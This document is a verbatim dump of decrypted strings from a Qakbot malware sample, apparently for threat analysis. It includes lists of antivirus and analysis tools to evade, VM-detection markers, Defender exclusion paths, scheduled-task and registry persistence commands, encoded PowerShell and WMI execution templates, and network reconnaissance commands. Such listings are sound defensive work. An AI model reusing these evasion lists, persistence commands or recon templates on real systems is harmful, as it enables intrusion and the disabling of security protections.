Full list of decrypted strings from a Qakbot (QBot) sample. Entries are reproduced verbatim as recovered; strings containing printf-style placeholders (e.g. %s, %u, %c, %08X) are format templates the malware fills in at runtime, not literal values.
Sample SHA-256: af6a9b7e7aefeb903c76417ed2b8399b73657440ad5f8b48a25cfe5e97ff868f
%SystemRoot%\SysWOW64\xwizard.exe
.dat
kernelbase.dll
WBJ_IGNORE
mpr.dll
%SystemRoot%\explorer.exe
%SystemRoot%\System32\CertEnrollCtrl.exe
https
SentinelServiceHost.exe;SentinelStaticEngine.exe;SentinelAgent.exe;SentinelStaticEngineScanner.exe;SentinelUI.exe
open
root\SecurityCenter2
%SystemRoot%\SysWOW64\SndVol.exe
%u.%u.%u.%u.%u.%u.%04x
1234567890
%SystemRoot%\System32\Utilman.exe
snxhk_border_mywnd
%SystemRoot%\SysWOW64\wextract.exe
avgcsrvx.exe;avgsvcx.exe;avgcsrva.exe
Win32_PhysicalMemory
Caption
ByteFence.exe
aswhooka.dll
dwengine.exe;dwarkdaemon.exe;dwwatcher.exe
%SystemRoot%\SysWOW64\grpconv.exe
VRTUAL;VMware;VMW;Xen
SELECT * FROM AntiVirusProduct
%s\%08X.dll
wininet.dll
avp.exe;kavtray.exe
rundll32.exe
Create
WQL
%SystemRoot%\System32\sethc.exe
AvastSvc.exe;aswEngSrv.exe;aswToolsSvc.exe;afwServ.exe;aswidsagent.exe;AvastUI.exe
Software\Classes
vkise.exe;isesrv.exe;cmdagent.exe
LastBootUpTime
MS_VM_CERT;VMware;Virtual Machine
Winsta0
.dll
Caption,Description,DeviceID,Manufacturer,Name,PNPDeviceID,Service,Status
SonicWallClientProtectionService.exe;SWDash.exe
t=%s time=[%02d:%02d:%02d-%02d/%02d/%d]
SystemRoot
CommandLine
%SystemRoot%\SysWOW64\explorer.exe
SOFTWARE\Wow6432Node\Microsoft AntiMalware\SpyNet
%s\system32\
SELECT * FROM Win32_OperatingSystem
wbj.go
System32
CynetEPS.exe;CynetMS.exe;CynetConsole.exe
C:\INTERNAL\__empty
cmd.exe
SOFTWARE\Microsoft\Windows\CurrentVersion\Run
*/*
MsMpEng.exe
image/pjpeg
{%02X%02X%02X%02X-%02X%02X-%02X%02X-%02X%02X-%02X%02X%02X%02X%02X%02X}
urlmon.dll
type=0x%04X
TRUE
Win32_ComputerSystem
%SystemRoot%\System32\backgroundTaskHost.exe
ALLUSERSPROFILE
.exe
\\.\pipe\
advapi32.dll
application/x-shockwave-flash
%ProgramFiles%\Windows Media Player\wmplayer.exe
ntdll.dll
%SystemRoot%\SysWOW64\Utilman.exe
CfGetPlatformInfo
userenv.dll
LocalLow
FALSE
coreServiceShell.exe;PccNTMon.exe;NTRTScan.exe
Sophos UI.exe;SophosUI.exe;SAVAdminService.exe;SavService.exe
image/jpeg
image/gif
displayName
Name
Win32_PnPEntity
.cfg
APPDATA
winsta0\default
%SystemRoot%\SysWOW64\CertEnrollCtrl.exe
%SystemRoot%\SysWOW64\backgroundTaskHost.exe
pstorec.dll
RepUx.exe
aaebcdeeifghiiojklmnooupqrstuuyvwxyyaz
\sf2.dll
%SystemRoot%\System32\dxdiag.exe
CSFalconService.exe;CSFalconContainer.exe
vbs
WRSA.exe
crypt32.dll
setupapi.dll
c:\saurufdifsdudqat.sys
%ProgramFiles(x86)%\Windows Media Player\wmplayer.exe
netapi32.dll
SOFTWARE\Microsoft\Microsoft Antimalware\Exclusions\Paths
VMware;PROD_VIRTUAL_DISK;VIRTUAL-DISK;XENSRC;20202020
%SystemRoot%\System32\grpconv.exe
SpyNetReporting
wtsapi32.dll
wpcap.dll
Packages
%SystemRoot%\explorer.exe
regsvr32.exe
aswhookx.dll
Content-Type: application/x-www-form-urlencoded
%SystemRoot%\SysWOW64\SearchIndexer.exe
%SystemRoot%\SysWOW64\AtBroker.exe
%SystemRoot%\System32\WerFault.exe
SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths
vmnat.exe
SubmitSamplesConsent
SysWOW64
shell32.dll
wmic process call create 'expand "%S" "%S"'
ROOT\CIMV2
Win32_Product
LOCALAPPDATA
%SystemRoot%\SysWOW64\mobsync.exe
ws2_32.dll
WScript.Sleep %u
Set objWMIService = GetObject("winmgmts:" & "{impersonationLevel=impersonate}!\\.\%coot\cimv2")
Set objProcess = GetObject("winmgmts:root\cimv2:Win32_Process")
errReturn = objProcess.Create("%s", null, nul, nul)
WSCript.Sleep 2000
Set fso = CreateObject("Scripting.FileSystemObject")
fso.DeleteFile("%s")
bcrypt.dll
SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Spynet
abcdefghijklmnopqrstuvwxyz
fshoster32.exe
%SystemRoot%\System32\SearchIndexer.exe
reg.exe ADD "HKLM\%s" /f /t %s /v "%s" /d "%s"
Set objWMIService = GetObject("winmgmts:" & "{impersonationLevel=impersonate}!\\.\%coot\cimv2")
Set objProcess = GetObject("winmgmts:root\cimv2:Win32_Process")
errReturn = objProcess.Create("%s", null, nul, nul)
gdi32.dll
Set objWMIService = GetObject("winmgmts:" & "{impersonationLevel=impersonate}!\\.\%coot\cimv2")
Set colFiles = objWMIService.ExecQuery("Select * From CIM_DataFile Where Name = '%s'")
For Each objFile in colFiles
objFile.Copy("%s")
Next
Win32_Process
SELECT * FROM Win32_Processor
user32.dll
Win32_Bios
%SystemRoot%\SysWOW64\explorer.exe
MBAMService.exe;mbamgui.exe
%SystemRoot%\SysWOW64\mspaint.exe
frida-winjector-helper-32.exe;frida-winjector-helper-64.exe;tcpdump.exe;windump.exe;ethereal.exe;wireshark.exe;ettercap.exe;rtsniff.exe;packetcapture.exe;capturenet.exe;qak_proxy;dumpcap.exe;CFF Explorer.exe;not_rundll32.exe;ProcessHacker.exe;tcpview.exe;filemon.exe;procmon.exe;idaq64.exe;loaddll32.exe;PETools.exe;ImportREC.exe;LordPE.exe;SysInspector.exe;proc_analyzer.exe;sysAnalyzer.exe;sniff_hit.exe;joeboxcontrol.exe;joeboxserver.exe;ResourceHacker.exe;x64dbg.exe;Fiddler.exe;sniff_hit.exe;sysAnalyzer.exe;BehaviorDumper.exe;processdumperx64.exe;anti-virus.EXE;sysinfoX64.exe;sctoolswrapper.exe;sysinfoX64.exe;FakeExplorer.exe;apimonitor-x86.exe;idaq.exe;dumper64.exe;user_imitator.exe;Velociraptor.exe
%SystemRoot%\System32\wextract.exe
egui.exe;ekrn.exe
select
%SystemRoot%\System32\wermgr.exe
iphlpapi.dll
SOFTWARE\Microsoft\Windows Defender\SpyNet
%SystemRoot%\SysWOW64\dxdiag.exe
%SystemRoot%\SysWOW64\WerFault.exe
%SystemRoot%\System32\AtBroker.exe
%SystemRoot%\SysWOW64\sethc.exe
%S.%06d
c:\\
S:(ML;;NW;;;LW)
fmon.exe
%SystemRoot%\System32\xwizard.exe
cscript.exe
Initializing database...
xagtnotif.exe;AppUIMonitor.exe
%ProgramFiles%\Internet Explorer\iexplore.exe
Win32_DiskDrive
aabcdeefghiijklmnoopqrstuuvwxyyz
%SystemRoot%\System32\mobsync.exe
%SystemRoot%\SysWOW64\wermgr.exe
kernel32.dll
%SystemRoot%\System32\mspaint.exe
bdagent.exe;vsserv.exe;vsservppl.exe
SOFTWARE\Microsoft\Microsoft AntiMalware\SpyNet
Caption,Description,Vendor,Version,InstallDate,InstallSource,PackageName
NTUSER.DAT
ccSvcHst.exe;NortonSecurity.exe;nsWscSvc.exe
from
mcshield.exe
%SystemRoot%\System32\SndVol.exe
VMware;VMW;QEMU
QEMU;VMware Pointing;VMware Accelerated;VMware SCSI;VMware SVGA;VMware Replay;VMware server memory;VirtualBox;CWSandbox;Virtual HD;QEMU;VirtIO;srootkit;vSockets;VBoxVideo;vmxnet;vmscsi;VMAUDIO;vmdebug;vm3dmp;vmrawdsk;vmx_svga;ansfltr;sbtisht;XENVIF;XENBUS;XENSRC;XENCLASS
shlwapi.dll
csc_ui.exe
CrAmTray.exe
Mozilla/5.0 (Windows NT 6.1; rv:77.0) Gecko/20100101 Firefox/77.0
%ProgramFiles(x86)%\Internet Explorer\iexplore.exe
SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList
ProgramData
netstat -nao
%s "$%s = \"%s\"; & $%s"
net localgroup
powershell.exe
route print
"%s\system32\schtasks.exe" /Create /ST %02u:%02u /RU "NT AUTHORITY\SYSTEM" /SC ONCE /tr "%s" /Z /ET %02u:%02u /tn %s
Component_08
ERROR: GetModuleFileNameW() failed with error: ERROR_INSUFFICIENT_BUFFER
net view
ipconfig /all
Self check
T2X!wWMVH1UkMHD7SBdbgfgXrNBd(5dmRNbBI9
4Lm7DW&yMF*ELN4D8oNp0CtKUf*C2LAstORIBV
Start screenshot
%s.%u
adrclient.dll
net share
qwinsta
\System32\WindowsPowerShell\v1.0\powershell.exe
at.exe %u:%u "%s" /I
Self test FAILED!!!
Component_07
whoami /all
/c ping.exe -n 6 127.0.0.1 & type "%s\System32\calc.exe" > "%s"
error res='%s' err=%d len=%u
nltest /domain_trusts /all_trusts
.lnk
cmd
schtasks.exe /Create /RU "NT AUTHORITY\SYSTEM" /SC ONSTART /TN %u /TR "%s" /NP /F
%s \"$%s = \\\"%s\\\\; & $%s\"
ERROR: GetModuleFileNameW() failed with error: %u
schtasks.exe /Delete /F /TN %u
arp -a
Self check ok!
cmd.exe /c set
%s %04x.%u %04x.%u res: %s seh_test: %u consts_test: %d vmdetected: %d createprocess: %d
Microsoft
powershell.exe -encodedCommand %S
SELF_TEST_1
microsoft.com,google.com,kernel.org,www.wikipedia.org,oracle.com,verisign.com,broadcom.com,yahoo.com,xfinity.com,irs.gov,linkedin.com
c:\ProgramData
nslookup -querytype=ALL -timeout=12 _ldap._tcp.dc._msdcs.%s
%u;%u;%u;
powershell.exe -encodedCommand
runas
/teorema505
Self test OK.
ProfileImagePath
p%08x